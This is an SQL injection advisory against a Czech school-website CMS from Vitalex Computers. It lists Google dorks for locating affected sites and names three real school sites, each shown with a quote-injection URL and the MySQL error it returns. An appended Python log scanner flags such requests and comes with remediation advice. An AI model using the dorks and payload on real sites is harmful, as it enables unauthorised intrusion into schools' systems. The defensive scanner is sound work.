#######################################################################################
# Exploit Title : Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webů SQL Injection Vulnerability
# Author : KingSkrupellos from Cyberizm Digital Security Team
# Date : 26/05/2018
# Vendor Homepage : vitalex.cz
# Exploit Risk : Medium
#######################################################################################
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba školních webů'' site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''
Other Possible Dorks =>
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
########################################################################################
# Example Sites =>
# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
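
For operators of an affected site, an added example (not part of the original advisory) that scans web server access logs for requests to the `/public/printAction.php` script named above whose `id` parameter is not a plain integer, as in the `id=235%27` request shown. The combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter named in the advisory. The other /public/ scripts it
# lists are not shown to be injectable on the page, so they are not matched.
AFFECTED_PATH = "/public/printAction.php"
PARAM = "id"

# Assumed log format: Apache/nginx "combined". Adjust for other formats.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def suspicious_requests(lines):
    """Return (ip, timestamp, status, decoded id) for every request to the
    affected script whose id value is not a plain decimal integer."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        url = urlsplit(m["target"])
        if url.path.lower() != AFFECTED_PATH.lower():
            continue
        # parse_qs percent-decodes, so %27 is compared as a literal quote.
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        for value in values:
            if not (value.isascii() and value.isdigit()):
                hits.append((m["ip"], m["ts"], int(m["status"]), value))
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/May/2018:10:01:02 +0200] "GET /public/printAction.php?id=235 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/May/2018:10:03:44 +0200] "GET /public/printAction.php?id=235%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/May/2018:10:03:50 +0200] "GET /index.php?type=Blog&id=12 HTTP/1.1" 200 8040 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} id={value!r}")
```

A hit means the parameter reached the script with non-numeric content; the underlying fix is still to bind `id` as an integer in a prepared statement and to stop returning raw MySQL errors to the client.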